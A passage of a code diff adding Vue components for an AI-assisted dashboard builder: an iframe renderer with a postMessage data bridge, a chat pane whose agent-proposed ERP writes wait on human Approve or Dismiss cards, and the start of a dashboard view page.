+const props = defineProps({
+	mode: { type: String, default: "builder" }, // "builder" | "view"
+	html: { type: String, default: "" },
+	dashboard: { type: Object, default: null }, // view mode: {name} at minimum
+	caps: { type: Object, default: () => ({}) },
+})
+
+// sources: the parsed #jarvis-sources list (save-dialog preview + payload);
+// state: "empty" | "loading" | "ready" | "error" for hosts that care.
+const emit = defineEmits(["sources", "state"])
+
+const { effectiveDark } = useJarvisTheme()
+
+const frame = ref(null)
+const doc = ref("")
+const loading = ref(false)
+const building = ref(false)
+const buildError = ref("")
+const frameH = ref(480) // view mode: grown by the iframe's height frames
+
+function errMsg(e) {
+	return (e && ((e.messages && e.messages[0]) || e.message)) || "Something went wrong."
+}
+
+function postToFrame(msg) {
+	const fw = frame.value && frame.value.contentWindow
+	if (fw) fw.postMessage({ jarvis: 1, ...msg }, "*")
+}
+
+// ── srcdoc assembly ──────────────────────────────────────────────────────────
+let readyTimer = null
+async function rebuild() {
+	if (!props.html) {
+		doc.value = ""
+		emit("state", "empty")
+		return
+	}
+	building.value = true
+	buildError.value = ""
+	loading.value = true
+	emit("state", "loading")
+	try {
+		let echartsSource = ""
+		if (/\becharts\b/i.test(props.html)) {
+			// Filesystem-relative ?raw import: echarts' exports map blocks bare
+			// deep imports; the raw source ships as its own lazy chunk.
+			const mod = await import("../../../node_modules/echarts/dist/echarts.min.js?raw")
+			echartsSource = (mod && mod.default) || ""
+		}
+		doc.value = buildSrcdoc(props.html, { dark: !!effectiveDark.value, echartsSource })
+		// Safety valve: if the frame never posts ready (user script threw before
+		// our runtime's DOMContentLoaded, etc.) don't spin forever.
+		clearTimeout(readyTimer)
+		readyTimer = setTimeout(() => (loading.value = false), 8000)
+	} catch (e) {
+		buildError.value = errMsg(e)
+		loading.value = false
+		emit("state", "error")
+	} finally {
+		building.value = false
+	}
+}
+
+watch(
+	() => props.html,
+	(h) => {
+		emit("sources", parseSourcesBlock(h))
+		rebuild()
+	},
+	{ immediate: true },
+)
+
+// Live theme relay - the runtime flips data-theme + fires jarvis:theme inside.
+watch(effectiveDark, (dark) => postToFrame({ type: "theme", dark: !!dark }))
+
+// ── data bridge ──────────────────────────────────────────────────────────────
+// run_report results resolve inside the iframe as {columns, rows}; query/
+// get_list results resolve as the plain rows array (documented in RUNTIME_JS).
+function dataPayload(data) {
+	if (data && typeof data === "object" && !Array.isArray(data)) {
+		if (data.columns) return { columns: data.columns, rows: data.rows || [] }
+		if (Array.isArray(data.rows)) return data.rows
+	}
+	return data
+}
+
+async function handleData(d) {
+	let reply
+	try {
+		const env =
+			props.mode === "view"
+				? await runDashboardSource(props.dashboard && props.dashboard.name, d.name)
+				: await callDashboardTool(d.tool, d.spec)
+		if (env && env.ok) {
+			reply = { ok: true, rows: dataPayload(env.data) }
+		} else {
+			const err = (env && env.error) || {}
+			reply = {
+				ok: false,
+				error: {
+					code: err.code || "InternalError",
+					message: err.message || "Couldn't load this data",
+				},
+			}
+		}
+	} catch (e) {
+		// Thrown (non-envelope) server error - map onto the bridge's codes.
+		const code =
+			e && (e.status === 403 || e.exc_type === "PermissionError")
+				? "PermissionError"
+				: e && (e.status === 404 || e.exc_type === "DoesNotExistError")
+					? "NotFound"
+					: "InternalError"
+		reply = { ok: false, error: { code, message: errMsg(e) } }
+	}
+	// Data failures render per-widget INSIDE the iframe (jarvis.renderError) -
+	// never a toast out here.
+	postToFrame({ type: "data:result", id: d.id, ...reply })
+}
+
+// ── export (lib injection + downloads live in lib/dashboardExport) ───────────
+const pendingExports = {}
+let exportSeq = 0
+
+async function exportAs(format, title) {
+	const lib = await loadCaptureLib()
+	const id = "x" + ++exportSeq
+	const result = new Promise((resolve, reject) => {
+		pendingExports[id] = {
+			resolve,
+			reject,
+			timer: setTimeout(() => {
+				delete pendingExports[id]
+				reject(new Error("Export timed out"))
+			}, 60000),
+		}
+	})
+	// pdf = the slide deck path (section.slide per page); png = one full-body shot
+	postToFrame({ type: "export", id, format: format === "pdf" ? "slides" : "png", lib, pixelRatio: 2 })
+	const images = await result
+	if (format === "pdf") await downloadPdf(images, title)
+	else downloadPng(images, title)
+}
+defineExpose({ exportAs })
+
+// ── frame messages (validated: our iframe's window + the jarvis:1 stamp) ─────
+function onMessage(e) {
+	const fw = frame.value && frame.value.contentWindow
+	if (!fw || e.source !== fw) return
+	const d = e.data
+	if (!d || d.jarvis !== 1) return
+	if (d.type === "ready") {
+		clearTimeout(readyTimer)
+		loading.value = false
+		emit("state", "ready")
+	} else if (d.type === "height") {
+		if (props.mode === "view") frameH.value = Math.max(480, Math.ceil(d.height || 0))
+	} else if (d.type === "data") {
+		handleData(d)
+	} else if (d.type === "export:result") {
+		const p = pendingExports[d.id]
+		if (!p) return
+		delete pendingExports[d.id]
+		clearTimeout(p.timer)
+		if (d.ok) p.resolve(d.images || [])
+		else {
+			const err = new Error((d.error && d.error.message) || "Export failed")
+			err.code = (d.error && d.error.code) || "CaptureFailed"
+			p.reject(err)
+		}
+	}
+}
+
+onMounted(() => window.addEventListener("message", onMessage))
+onBeforeUnmount(() => {
+	window.removeEventListener("message", onMessage)
+	clearTimeout(readyTimer)
+	for (const id of Object.keys(pendingExports)) {
+		clearTimeout(pendingExports[id].timer)
+		delete pendingExports[id]
+	}
+})
+</script>

--- a/frontend/src/pages/dashboards/DashboardChatPane.vue
+++ b/frontend/src/pages/dashboards/DashboardChatPane.vue
@@ -1,0 +1,504 @@
+<template>
+	<div class="flex h-full flex-col overflow-hidden bg-surface-white">
+		<!-- header: title + New chat / Open in chat -->
+		<div class="flex shrink-0 items-start justify-between gap-2 border-b px-4 py-3">
+			<div class="flex min-w-0 flex-col gap-0.5">
+				<span class="text-base font-semibold text-ink-gray-9">Describe a dashboard</span>
+				<span class="text-p-sm text-ink-gray-6">Jarvis draws it on the canvas above</span>
+			</div>
+			<div class="flex shrink-0 items-center gap-1">
+				<Button
+					v-if="conversation"
+					variant="ghost"
+					label="Open in chat"
+					iconLeft="message-circle"
+					@click="router.push('/c/' + conversation)"
+				/>
+				<Button variant="ghost" label="New chat" iconLeft="plus" @click="newChat" />
+			</div>
+		</div>
+
+		<!-- transcript -->
+		<div ref="scroller" class="min-h-0 flex-1 overflow-y-auto px-4 py-4">
+			<div v-if="loadingTranscript && !bubbles.length" class="flex justify-center py-8">
+				<LoadingIndicator class="size-5 text-ink-gray-5" />
+			</div>
+
+			<!-- empty state: nudge toward the natural-language flow -->
+			<div
+				v-else-if="!bubbles.length && !runActive"
+				class="flex h-full flex-col items-center justify-center gap-3 px-2 text-center"
+			>
+				<FeatherIcon name="bar-chart-2" class="size-7.5 text-ink-gray-5" />
+				<div class="flex flex-col items-center gap-1">
+					<span class="text-base font-medium text-ink-gray-8">Describe a dashboard</span>
+					<span class="text-p-sm text-ink-gray-6">
+						e.g. "Monthly sales by territory with a top-customers table"
+					</span>
+				</div>
+			</div>
+
+			<div v-else class="flex flex-col gap-3">
+				<template v-for="m in bubbles" :key="m.name">
+					<!-- user: right-aligned surface-gray bubble -->
+					<div v-if="m.role === 'user'" class="flex justify-end">
+						<div
+							class="max-w-[85%] whitespace-pre-wrap rounded-lg bg-surface-gray-2 px-3 py-2 text-base text-ink-gray-8"
+						>
+							{{ m.content }}
+						</div>
+					</div>
+					<!-- assistant error: inline red note (ChatView semantics, compact) -->
+					<div v-else-if="m.error" class="flex">
+						<div class="max-w-[95%] text-sm text-ink-red-4">
+							{{ m.content || "That didn't go through. Try again." }}
+						</div>
+					</div>
+					<!-- assistant: markdown, same renderer + prose classes as the
+					     Approvals/Agents surfaces (renderMarkdown escapes HTML first) -->
+					<div v-else class="flex">
+						<div
+							class="prose prose-sm min-w-0 max-w-none text-ink-gray-8"
+							v-html="renderBubble(m.content)"
+						/>
+					</div>
+				</template>
+
+				<!-- thinking indicator: subtle three-dot pulse while a run is active -->
+				<div v-if="runActive" role="status" aria-live="polite" class="flex items-center gap-2 pt-1">
+					<span class="flex gap-1" aria-hidden="true">
+						<span
+							v-for="i in 3"
+							:key="i"
+							class="size-1.5 rounded-full bg-surface-gray-5 motion-safe:animate-pulse"
+							:style="{ animationDelay: (i - 1) * 0.18 + 's' }"
+						/>
+					</span>
+					<span class="text-xs text-ink-gray-5">Thinking…</span>
+				</div>
+			</div>
+		</div>
+
+		<!-- parked ERP-write confirmations (create/update Jarvis Dashboard…):
+		     rendered in-pane so a chat-driven save never dead-ends into the
+		     full chat view just to click Approve -->
+		<div v-if="pendingCards.length" class="flex shrink-0 flex-col gap-2 border-t px-4 py-3">
+			<div
+				v-for="pa in pendingCards"
+				:key="pa.token"
+				class="flex flex-col gap-2 rounded-md p-3 ring-1 ring-outline-gray-modals"
+			>
+				<!-- human headline (+ detail line from the dry-run preview), never
+				     the raw "create_doc doctype=…" tool string -->
+				<div class="flex min-w-0 flex-col gap-0.5">
+					<span class="text-sm font-medium text-ink-gray-8">{{ cardTitle(pa) }}</span>
+					<span v-if="cardMeta(pa)" class="text-xs text-ink-gray-6">{{ cardMeta(pa) }}</span>
+				</div>
+				<div class="flex items-center gap-2">
+					<Button variant="solid" label="Approve" :loading="pa.busy" @click="approve(pa)" />
+					<Button variant="ghost" label="Dismiss" :disabled="pa.busy" @click="dismiss(pa)" />
+				</div>
+			</div>
+		</div>
+
+		<!-- composer: autosizing textarea + voice + send -->
+		<div class="shrink-0 border-t px-4 py-3">
+			<div ref="box" @keydown="onKeydown" @input="autoGrow">
+				<FormControl
+					type="textarea"
+					:rows="2"
+					placeholder="Describe the dashboard…"
+					:modelValue="draft"
+					:disabled="sending"
+					@update:modelValue="(v) => (draft = v)"
+				/>
+			</div>
+			<div class="mt-2 flex items-center justify-between gap-2">
+				<div class="flex items-center gap-1.5">
+					<VoiceRecorder v-if="caps.stt_enabled" compact @transcript="onTranscript" />
+				</div>
+				<Button
+					variant="solid"
+					label="Send"
+					:disabled="!draft.trim()"
+					:loading="sending"
+					@click="send"
+				/>
+			</div>
+		</div>
+	</div>
+</template>
+
+<script setup>
+// DashboardChatPane - the embedded assistant chat on the Dashboards builder
+// tab (bottom pane); a fork of triggers/TriggerChatPane.vue. State machine:
+//   conversation id  → useStorage("jarvis-dash-conv-<user>") - persisted per
+//                      user; "" means no conversation yet.
+//   first send       → send_message(conversation:"", context {"page":"dashboards"})
+//                      creates/focuses one server-side; the returned
+//                      conversation_id is stored.
+//   mount w/ stored  → load its transcript; a 404 (deleted chat) silently
+//                      clears storage and starts fresh.
+//   realtime         → "jarvis:event" frames for OUR conversation schedule a
+//                      debounced (300ms) get_conversation refetch; run:start
+//                      raises run-active, run:end / run:error clear it.
+//                      kind==="canvas" frames for our conversation bubble up
+//                      as emit("canvas", {message_id, items}) - the page pulls
+//                      the html artifact onto the canvas pane.
+//   no socket        → (?nosocket / headless QA) a bounded refetch ladder after
+//                      each send stands in for the realtime frames.
+import { ref, computed, nextTick, inject, onMounted, onBeforeUnmount } from "vue"
+import { useRouter } from "vue-router"
+import { useStorage } from "@vueuse/core"
+import { Button, FeatherIcon, FormControl, LoadingIndicator, toast } from "frappe-ui"
+import VoiceRecorder from "@/components/VoiceRecorder.vue"
+import { renderMarkdown } from "@/markdown"
+import { session } from "@/data/session"
+import { sendDashboardChat, getDashboardConversation } from "@/api/dashboards"
+import { listPendingConfirmations, confirmTool, dismissTool } from "@/api"
+
+// get_dashboards_caps payload (creatable_scopes/manageable_roles feed the save
+// dialog; stt_enabled - when the backend sends it - gates the mic)
+const props = defineProps({
+	caps: { type: Object, default: () => ({}) },
+})
+
+// canvas: {message_id, items} for a canvas frame on our conversation;
+// activity: a run ended (the page may refresh lists); reset: New chat clicked.
+const emit = defineEmits(["canvas", "activity", "reset"])
+
+const router = useRouter()
+const socket = inject("$socket", null)
+
+function errMsg(e) {
+	return (e && ((e.messages && e.messages[0]) || e.message)) || "Something went wrong."
+}
+
+// ── conversation persistence (per user, ChatComposer's namespacing idiom) ────
+const conversation = useStorage(`jarvis-dash-conv-${session.user || "anon"}`, "")
+
+// ── transcript ────────────────────────────────────────────────────────────────
+const messages = ref([])
+const loadingTranscript = ref(false)
+const scroller = ref(null)
+
+// user/assistant rows with visible content only (tool rows and internal
+// chatter stay out of this compact pane)
+const bubbles = computed(() =>
+	messages.value.filter(
+		(m) => (m.role === "user" || m.role === "assistant") && String(m.content || "").trim()
+	)
+)
+
+// ChatView's stripBlocks, minimal subset: internal fenced blocks (actions,
+// confirms, cards…) never render as raw fences in the pane.
+function stripBlocks(text) {
+	return (text || "")
+		.replace(/```jarvis-action[ \t]*\n[\s\S]*?```/g, "")
+		.replace(/```confirm[ \t]*\n[\s\S]*?```/g, "")
+		.replace(/```jarvis-ask[ \t]*\n[\s\S]*?```/g, "")
+		.replace(/```jarvis-cards[ \t]*\n[\s\S]*?```/g, "")
+		.replace(/```jarvis-skill[ \t]*\n[\s\S]*?```/g, "")
+		.replace(/```jarvis-macro[ \t]*\n[\s\S]*?```/g, "")
+		.replace(/```jarvis-chart[ \t]*\n[\s\S]*?```/g, "")
+		.replace(/\n{3,}/g, "\n\n")
+		.trim()
+}
+function renderBubble(text) {
+	return renderMarkdown(stripBlocks(text))
+}
+
+function scrollBottom() {
+	const el = scroller.value
+	if (el) el.scrollTop = el.scrollHeight
+}
+
+function isGone(e) {
+	return !!(
+		e &&
+		(e.status === 404 ||
+			e.exc_type === "DoesNotExistError" ||
+			e.status === 403 ||
+			e.exc_type === "PermissionError")
+	)
+}
+
+// monotonic request id - stale refetches dropped (useListPage idiom)
+let loadReq = 0
+async function loadTranscript({ initial = false } = {}) {
+	const id = ++loadReq
+	if (!conversation.value) return
+	if (initial) loadingTranscript.value = true
+	try {
+		const d = (await getDashboardConversation(conversation.value)) || {}
+		if (id !== loadReq) return
+		messages.value = d.messages || []
+		nextTick(scrollBottom)
+	} catch (e) {
+		if (id !== loadReq) return
+		if (isGone(e)) {
+			// the stored conversation was deleted (or reassigned) - start fresh
+			conversation.value = ""
+			messages.value = []
+			runActive.value = false
+		}
+		// transient errors keep the last-good transcript; the next frame retries
+	} finally {
+		if (id === loadReq) loadingTranscript.value = false
+	}
+}
+
+// debounced refetch driven by realtime frames
+let refetchTimer = null
+function scheduleRefetch() {
+	clearTimeout(refetchTimer)
+	refetchTimer = setTimeout(() => {
+		loadTranscript()
+		refreshPending()
+	}, 300)
+}
+
+// ── parked confirmations (gated ERP writes park for human approval) ──────────
+const pendingCards = ref([])
+
+async function refreshPending() {
+	if (!conversation.value) {
+		pendingCards.value = []
+		return
+	}
+	try {
+		const env = await listPendingConfirmations(conversation.value)
+		const items = (env && env.data && env.data.pending) || []
+		// keep in-flight busy flags across refreshes
+		const busy = new Set(pendingCards.value.filter((c) => c.busy).map((c) => c.token))
+		pendingCards.value = items.map((it) => ({ ...it, busy: busy.has(it.token) }))
+	} catch {
+		// transient - the next frame retries
+	}
+}
+
+function removeCard(token) {
+	pendingCards.value = pendingCards.value.filter((c) => c.token !== token)
+}
+
+// ── pending-card copy ─────────────────────────────────────────────────────────
+// A card only carries what list_pending_confirmations returns (token, tool,
+// preview, summary, conversation, run_id). Rich path: a sandboxed dry-run
+// preview (preview.would = the doc exactly as it would save) names the
+// dashboard and its scope. Fallback: clean the _describe_call line
+// ("create_doc doctype=…" → "Create a …") so the raw tool string never shows.
+const CARD_VERBS = {
+	create_doc: "Create",
+	update_doc: "Update",
+	delete_doc: "Delete",
+	submit_doc: "Submit",
+	cancel_doc: "Cancel",
+}
+const SCOPE_LABELS = { User: "Private", Role: "Shared with a role", Org: "Everyone" }
+function previewDoc(pa) {
+	const w = pa && pa.preview && pa.preview.would
+	return w && typeof w === "object" && !Array.isArray(w) ? w : null
+}
+// _describe_call joins "key=value" pairs with spaces and values may hold
+// spaces ("Jarvis Dashboard") - a value runs until the next key or the end.
+// Anchored on a word boundary so "name=" never matches inside "docname=".
+function summaryArg(s, key) {
+	const m = new RegExp("(?:^|\\s)" + key + "=(.*?)(?=\\s+[a-z_]+=|$)").exec(s || "")
+	return m ? m[1].trim() : ""
+}
+function cardTitle(pa) {
+	const verb = CARD_VERBS[pa.tool]
+	const doc = previewDoc(pa)
+	if (doc && doc.doctype === "Jarvis Dashboard") {
+		return `${verb || "Save"} dashboard: ${doc.dashboard_title || doc.name || "(unnamed)"}`
+	}
+	if (doc && doc.doctype && verb) {
+		const name = verb === "Create" ? "" : doc.name || ""
+		return `${verb} ${doc.doctype}${name ? " · " + name : ""}`
+	}
+	const raw = pa.summary || (pa.preview && pa.preview.summary) || ""
+	const m = /^(create|update|delete|submit|cancel)_doc\b/.exec(raw)
+	if (m) {
+		const v = CARD_VERBS[m[1] + "_doc"]
+		const dt = summaryArg(raw, "doctype")
+		const nm = summaryArg(raw, "name") || summaryArg(raw, "docname")
+		if (dt === "Jarvis Dashboard") return `${v} a dashboard${nm ? ": " + nm : ""}`
+		if (dt) return `${v} ${dt}${nm ? " · " + nm : ""}`
+	}
+	return raw || "Confirm this action"
+}
+function cardMeta(pa) {
+	const doc = previewDoc(pa)
+	if (!doc || doc.doctype !== "Jarvis Dashboard") return ""
+	const scope =
+		doc.scope === "Role" && doc.target_role
+			? `Shared with ${doc.target_role}`
+			: SCOPE_LABELS[doc.scope] || ""
+	return [doc.dashboard_type, scope].filter(Boolean).join(" · ")
+}
+
+async function approve(pa) {
+	pa.busy = true
+	try {
+		const r = await confirmTool(pa.token, conversation.value)
+		if (r && r.ok === false) {
+			toast.error("Couldn't confirm — it may have expired. Ask again in the chat.")
+		}
+	} catch (e) {
+		toast.error(errMsg(e))
+	} finally {
+		removeCard(pa.token)
+		// the parked run resumes server-side after a confirm: refresh both the
+		// transcript (receipt chip) and anything list-shaped upstream
+		scheduleRefetch()
+		emit("activity")
+	}
+}
+
+async function dismiss(pa) {
+	pa.busy = true
+	try {
+		await dismissTool(pa.token, conversation.value)
+	} catch (e) {
+		toast.error(errMsg(e))
+	} finally {
+		removeCard(pa.token)
+		scheduleRefetch()
+	}
+}
+
+// ── run state + composer ──────────────────────────────────────────────────────
+const runActive = ref(false)
+const sending = ref(false)
+const draft = ref("")
+const box = ref(null)
+
+function autoGrow() {
+	const ta = box.value && box.value.querySelector("textarea")
+	if (!ta) return
+	ta.style.height = "auto"
+	ta.style.height = Math.min(ta.scrollHeight, 180) + "px"
+}
+
+function onKeydown(e) {
+	// Enter sends, Shift+Enter keeps the newline
+	if (e.key === "Enter" && !e.shiftKey) {
+		e.preventDefault()
+		send()
+	}
+}
+
+function onTranscript(text) {
+	// dictation appends to any typed draft (ChatComposer precedent)
+	const cur = draft.value
+	draft.value = cur.trim() ? cur.replace(/\s+$/, "") + " " + text : text
+	nextTick(autoGrow)
+}
+
+async function send() {
+	const text = draft.value.trim()
+	if (!text || sending.value) return
+	sending.value = true
+	draft.value = ""
+	nextTick(autoGrow)
+	// optimistic user bubble - reconciled by the next transcript refetch
+	const tmpName = `tmp-${Date.now()}`
+	messages.value = [...messages.value, { name: tmpName, role: "user", content: text }]
+	nextTick(scrollBottom)
+	try {
+		const r = (await sendDashboardChat(conversation.value, text)) || {}
+		if (r.ok === false) {
+			// rejected (single-flight guard / usage cap) - nothing persisted
+			messages.value = messages.value.filter((m) => m.name !== tmpName)
+			if (!draft.value) draft.value = text
+			toast.error(r.reason || "Couldn't send your message.")
+			return
+		}
+		if (r.conversation_id && r.conversation_id !== conversation.value) {
+			conversation.value = r.conversation_id
+		}
+		runActive.value = true
+		nextTick(scrollBottom)
+		if (!socket) startNoSocketLadder()
+	} catch (e) {
+		messages.value = messages.value.filter((m) => m.name !== tmpName)
+		if (!draft.value) draft.value = text
+		toast.error(errMsg(e))
+	} finally {
+		sending.value = false
+	}
+}
+
+function newChat() {
+	loadReq++ // drop any in-flight transcript load
+	conversation.value = ""
+	messages.value = []
+	pendingCards.value = []
+	runActive.value = false
+	draft.value = ""
+	nextTick(autoGrow)
+	// the page clears its builder seed (canvas html, editing state) with us
+	emit("reset")
+}
+defineExpose({ newChat })
+
+// ── realtime ──────────────────────────────────────────────────────────────────
+function onEvent(p) {
+	if (!p || !p.kind) return
+	// turn frames carry conversation_id; action:pending frames carry conversation
+	const frameConv = p.conversation_id || p.conversation
+	if (!conversation.value || frameConv !== conversation.value) return
+	// the agent drew/updated an artifact this turn - the page pulls the html
+	// item onto the canvas pane
+	if (p.kind === "canvas") {
+		emit("canvas", { message_id: p.message_id, items: p.items })
+		return
+	}
+	// any frame for OUR conversation refreshes the transcript (debounced)
+	scheduleRefetch()
+	switch (p.kind) {
+		case "run:start":
+			runActive.value = true
+			break
+		case "run:end":
+			runActive.value = false
+			emit("activity")
+			break
+		case "run:error":
+			runActive.value = false
+			break
+	}
+}
+
+// no-socket fallback (?nosocket / headless QA): a bounded refetch ladder after
+// each send; run-active clears when the reply settles (or at the ladder's end).
+let ladderTimers = []
+function startNoSocketLadder() {
+	ladderTimers.forEach(clearTimeout)
+	ladderTimers = [3000, 8000, 15000, 30000, 60000].map((ms, i, arr) =>
+		setTimeout(async () => {
+			await loadTranscript()
+			await refreshPending()
+			const last = bubbles.value[bubbles.value.length - 1]
+			const settled = last && last.role === "assistant" && !last.streaming
+			if (settled || i === arr.length - 1) {
+				runActive.value = false
+				emit("activity")
+			}
+		}, ms)
+	)
+}
+
+onMounted(() => {
+	if (conversation.value) {
+		loadTranscript({ initial: true })
+		refreshPending()
+	}
+	socket && socket.on && socket.on("jarvis:event", onEvent)
+})
+onBeforeUnmount(() => {
+	socket && socket.off && socket.off("jarvis:event", onEvent)
+	clearTimeout(refetchTimer)
+	ladderTimers.forEach(clearTimeout)
+})
+</script>

--- a/frontend/src/pages/dashboards/DashboardChatPane.vue
+++ b/frontend/src/pages/dashboards/DashboardChatPane.vue
@@ -118,15 +118,15 @@
 					<VoiceRecorder v-if="caps.stt_enabled" compact @transcript="onTranscript" />
 					<!-- explicit data-mode: Auto lets the agent decide; Static bakes the
 					     numbers in (one-time report); Live declares view-time sources.
-					     Option-chip idiom (TriggerDetail's segmented switch). -->
-					<span class="ml-1 text-xs text-ink-gray-5">Data</span>
-					<Button
-						v-for="m in DATA_MODES"
-						:key="m.value"
-						:label="m.label"
-						:variant="dataMode === m.value ? 'solid' : 'subtle'"
-						:disabled="sending"
-						@click="dataMode = m.value"
+					     TabButtons = real radio-group semantics + the raised-chip look,
+					     so the active option isn't a second solid next to Send. -->
+					<span class="ml-1 text-xs text-ink-gray-5" title="How this dashboard gets its data">
+						Data
+					</span>
+					<TabButtons
+						:buttons="DATA_MODES"
+						:model-value="dataMode"
+						@update:model-value="(v) => (dataMode = v || 'auto')"
 					/>
 				</div>
 				<Button
@@ -162,7 +162,7 @@
 import { ref, computed, nextTick, inject, onMounted, onBeforeUnmount } from "vue"
 import { useRouter } from "vue-router"
 import { useStorage } from "@vueuse/core"
-import { Button, FeatherIcon, FormControl, LoadingIndicator, toast } from "frappe-ui"
+import { Button, FeatherIcon, FormControl, LoadingIndicator, TabButtons, toast } from "frappe-ui"
 import VoiceRecorder from "@/components/VoiceRecorder.vue"
 import { renderMarkdown } from "@/markdown"
 import { session } from "@/data/session"
@@ -173,6 +173,9 @@ import { listPendingConfirmations, confirmTool, dismissTool } from "@/api"
 // dialog; stt_enabled - when the backend sends it - gates the mic)
 const props = defineProps({
 	caps: { type: Object, default: () => ({}) },
+	// when revising a saved dashboard, its name — forwarded in the send context
+	// so the agent knows which dashboard it is iterating on ("" = a new one).
+	editingName: { type: String, default: "" },
 })
 
 // canvas: {message_id, items} for a canvas frame on our conversation;
@@ -385,15 +388,17 @@ const sending = ref(false)
 const draft = ref("")
 const box = ref(null)
 
-// Explicit data-mode toggle (goal requirement): "" = Auto (agent decides),
+// Explicit data-mode toggle (goal requirement): "auto" = agent decides,
 // "static" = baked one-time report, "live" = declared view-time sources.
-// Persisted per user so the choice survives page hops.
+// Persisted per user so the choice survives page hops. ("auto" rather than ""
+// so reka-ui's RadioGroup has a real value to select.) The API wrapper only
+// forwards static/live; auto sends no data_mode.
 const DATA_MODES = [
-	{ label: "Auto", value: "" },
+	{ label: "Auto", value: "auto" },
 	{ label: "Static", value: "static" },
 	{ label: "Live", value: "live" },
 ]
-const dataMode = useStorage(`jarvis-dash-datamode-${session.user || "anon"}`, "")
+const dataMode = useStorage(`jarvis-dash-datamode-${session.user || "anon"}`, "auto")
 
 function autoGrow() {
 	const ta = box.value && box.value.querySelector("textarea")
@@ -428,7 +433,8 @@ async function send() {
 	messages.value = [...messages.value, { name: tmpName, role: "user", content: text }]
 	nextTick(scrollBottom)
 	try {
-		const r = (await sendDashboardChat(conversation.value, text, dataMode.value)) || {}
+		const r =
+			(await sendDashboardChat(conversation.value, text, dataMode.value, props.editingName)) || {}
 		if (r.ok === false) {
 			// rejected (single-flight guard / usage cap) - nothing persisted
 			messages.value = messages.value.filter((m) => m.name !== tmpName)

--- a/frontend/src/pages/dashboards/DashboardChatPane.vue
+++ b/frontend/src/pages/dashboards/DashboardChatPane.vue
@@ -116,6 +116,18 @@
 			<div class="mt-2 flex items-center justify-between gap-2">
 				<div class="flex items-center gap-1.5">
 					<VoiceRecorder v-if="caps.stt_enabled" compact @transcript="onTranscript" />
+					<!-- explicit data-mode: Auto lets the agent decide; Static bakes the
+					     numbers in (one-time report); Live declares view-time sources.
+					     Option-chip idiom (TriggerDetail's segmented switch). -->
+					<span class="ml-1 text-xs text-ink-gray-5">Data</span>
+					<Button
+						v-for="m in DATA_MODES"
+						:key="m.value"
+						:label="m.label"
+						:variant="dataMode === m.value ? 'solid' : 'subtle'"
+						:disabled="sending"
+						@click="dataMode = m.value"
+					/>
 				</div>
 				<Button
 					variant="solid"
@@ -373,6 +385,16 @@ const sending = ref(false)
 const draft = ref("")
 const box = ref(null)
 
+// Explicit data-mode toggle (goal requirement): "" = Auto (agent decides),
+// "static" = baked one-time report, "live" = declared view-time sources.
+// Persisted per user so the choice survives page hops.
+const DATA_MODES = [
+	{ label: "Auto", value: "" },
+	{ label: "Static", value: "static" },
+	{ label: "Live", value: "live" },
+]
+const dataMode = useStorage(`jarvis-dash-datamode-${session.user || "anon"}`, "")
+
 function autoGrow() {
 	const ta = box.value && box.value.querySelector("textarea")
 	if (!ta) return
@@ -406,7 +428,7 @@ async function send() {
 	messages.value = [...messages.value, { name: tmpName, role: "user", content: text }]
 	nextTick(scrollBottom)
 	try {
-		const r = (await sendDashboardChat(conversation.value, text)) || {}
+		const r = (await sendDashboardChat(conversation.value, text, dataMode.value)) || {}
 		if (r.ok === false) {
 			// rejected (single-flight guard / usage cap) - nothing persisted
 			messages.value = messages.value.filter((m) => m.name !== tmpName)

--- a/frontend/src/pages/dashboards/DashboardView.vue
+++ b/frontend/src/pages/dashboards/DashboardView.vue
@@ -1,0 +1,265 @@
+<template>
+	<div class="flex h-full flex-col overflow-hidden">
+		<LayoutHeader>
+			<template #left-header>
+				<Breadcrumbs
+					:items="[
+						{ label: 'Dashboards', route: { name: 'DashboardsPage', hash: '#saved' } },
+						{ label: detail ? detail.dashboard_title || detail.name : id },
+					]"
+				/>
+			</template>
+			<template #right-header>
+				<template v-if="detail">
+					<Dropdown v-if="moreOptions.length" :options="moreOptions">
+						<!-- label → aria-label on icon-only buttons (frappe-ui) -->
+						<Button icon="more-horizontal" variant="ghost" label="Dashboard actions" />
+					</Dropdown>
+					<Button label="Discuss in chat" iconLeft="message-circle" @click="discussInChat" />
+					<Button
+						v-if="detail.can_edit"
+						label="Edit in builder"
+						iconLeft="edit-2"
+						@click="router.push({ name: 'DashboardsPage', query: { edit: detail.name } })"
+					/>
+					<Dropdown :options="exportOptions">
+						<Button
+							variant="solid"
+							label="Export"
+							iconRight="chevron-down"
+							:loading="exporting"
+						/>
+					</Dropdown>
+				</template>
+			</template>
+		</LayoutHeader>
+
+		<!-- loading -->
+		<div v-if="loading" class="flex flex-1 items-center justify-center">
+			<LoadingIndicator class="size-5 text-ink-gray-5" />
+		</div>
+
+		<!-- §3.8 permission-blocked state -->
+		<div v-else-if="blocked" class="flex flex-1 flex-col items-center justify-center gap-3 px-8">
+			<div class="flex flex-col items-center gap-3 rounded-md border border-dashed p-8 text-center">
+				<FeatherIcon name="alert-triangle" class="size-10 text-ink-red-4" />
+				<div class="flex flex-col items-center gap-1">
+					<span class="text-lg font-medium text-ink-gray-8">No access to this dashboard</span>
+					<span class="text-p-base text-ink-gray-6">
+						It may be private or shared with a role you don't hold.
+					</span>
+				</div>
+				<Button label="Back to dashboards" iconLeft="arrow-left" @click="goBack" />
+			</div>
+		</div>
+
+		<!-- not found -->
+		<div v-else-if="notFound" class="flex flex-1 flex-col items-center justify-center gap-3 px-8 text-center">
+			<FeatherIcon name="bar-chart-2" class="size-10 text-ink-gray-4" />
+			<div class="flex flex-col items-center gap-1">
+				<span class="text-lg font-medium text-ink-gray-8">Dashboard not found</span>
+				<span class="text-p-base text-ink-gray-6">It may have been deleted.</span>
+			</div>
+			<Button label="Back to dashboards" iconLeft="arrow-left" @click="goBack" />
+		</div>
+
+		<!-- §3.8 error + retry (transient load failure) -->
+		<div v-else-if="error" class="flex flex-1 flex-col items-center justify-center gap-3 px-8 text-center">
+			<ErrorMessage :message="error" />
+			<Button label="Retry" :loading="loading" @click="load" />
+		</div>
+
+		<!-- the dashboard -->
+		<div v-else-if="detail" class="min-h-0 flex-1 overflow-y-auto">
+			<div class="flex flex-wrap items-center gap-2 px-5 pt-4">
+				<h1 class="text-lg font-semibold text-ink-gray-9">
+					{{ detail.dashboard_title || detail.name }}
+				</h1>
+				<Badge
+					v-if="detail.dashboard_type"
+					variant="subtle"
+					theme="gray"
+					:label="detail.dashboard_type"
+				/>
+				<Badge
+					v-if="detail.scope === 'Role'"
+					variant="subtle"
+					theme="blue"
+					:label="detail.target_role || 'Role'"
+				/>
